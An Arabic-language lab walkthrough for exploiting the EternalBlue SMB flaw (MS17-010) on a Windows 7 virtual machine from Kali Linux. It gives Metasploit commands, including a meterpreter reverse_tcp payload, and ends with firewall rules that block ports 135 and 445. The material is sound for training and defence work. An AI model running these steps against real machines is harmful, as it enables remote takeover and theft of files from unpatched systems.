
دليل مختبر خطوة بخطوة يوضح استغلال EternalBlue (CVE-2017-0144) ضد بروتوكول SMB لنظام Windows 7 باستخدام Metasploit، بما في ذلك خطوات الإعداد والاستغلال والتخفيف.
LAB: هجوم على نظام التشغيل Windows باستخدام ثغرة بروتوكول SMB.
في هذا المختبر، سنستخدم جهازي كمبيوتر لمحاكاة هجوم يعتمد على ثغرة في بروتوكول SMB لنظام التشغيل Windows. أحد الأجهزة يعمل بنظام Kali Linux، ويلعب دور المهاجم (hacker). والآخر يلعب دور الضحية (victim). جهاز الضحية يعمل بنظام Windows 7 64 بت الذي يحتوي على ثغرة SMB. للقيام بذلك، على جهاز Kali Linux سنستخدم كود الاستغلال المسمى EternalBlue لشن الهجوم على جهاز Windows 7.
Server Message Block (SMB) هو بروتوكول لمشاركة الملفات شائع جداً على منصة Windows من Microsoft. بفضل هذا البروتوكول SMB، يمكن لأجهزة Windows المتصلة ببعضها في نفس الشبكة أو في نفس المجال (Domain) مشاركة الملفات فيما بينها. حتى الآن، يُعرف SMB أيضاً باسم Common Internet File Sharing (CIFS).
EternalBlue هو كود استغلال معلوماتي، يعتمد على ثغرة في بروتوكول SMB عبر المنفذ 445. في البداية، تم تطوير EternalBlue بواسطة وكالة الأمن القومي الأمريكية (NSA). الاسم الكامل بالإنكليزية هو U.S. National Security Agency. ولكن بعد ذلك، تم تسريبه من قبل مجموعة القراصنة The Shadow Brokers في عام 2017. وفي نفس العام، وقع هجوم واسع النطاق بفيروس تشفير البيانات – برمجية الفدية (Ransomware)، استهدف أجهزة Windows من Microsoft في جميع أنحاء العالم. ومن بينها، الأكثر شهرة هو فيروس WannaCry. حتى الآن، على الرغم من أن Microsoft قد سدت هذه الثغرة عن طريق التحديث الأمني MS17-010، إلا أن عدداً كبيراً من أجهزة Windows حول العالم لا تزال تحتوي على هذه الثغرة. تم الإعلان عن هذه الثغرة في (ثغرة تنفيذ التعليمات البرمجية عن بعد في Windows SMB). هذه الثغرة خطيرة جداً وسهلة الاستغلال. الجدير بالذكر أنه لشن هجوم عبر ثغرة بروتوكول SMB، لا يحتاج المخترق إلى إرسال أو خداع الضحية لتحميل أو تشغيل أي فيروس ضار. أي أن الضحية حتى لو لم يفعل شيئاً، يمكن للمخترق بسهولة مهاجمته والاستيلاء على التحكم في جهازه دون علمه.
تجهيز جهازين افتراضيين يعملان على برنامج VMware Workstation:

على جهاز Kali الافتراضي (المهاجم):
ifconfigservice postgresql startservice postgresql statusعلى جهاز Windows 7 الافتراضي (الضحية):
ipconfigmsfconsole
search ms17_010
use 0 -> set payload windows/x64/meterpreter/reverse_tcp

=> هنا يعتبر المخترق قد نجح في اختراق جهاز الضحية. في هذه المرحلة، يمكن للمخترق حذف أو سرقة الملفات من جهاز الضحية دون علمهم. بل ويمكنه أيضاً تحميل وتشغيل الفيروسات مباشرة عليه.
لتجنب استغلال بروتوكول SMB والاستفادة منه، نحتاج إلى القيام ببعض الأمور التالية:
netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_Cong_135"netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_Cong_445"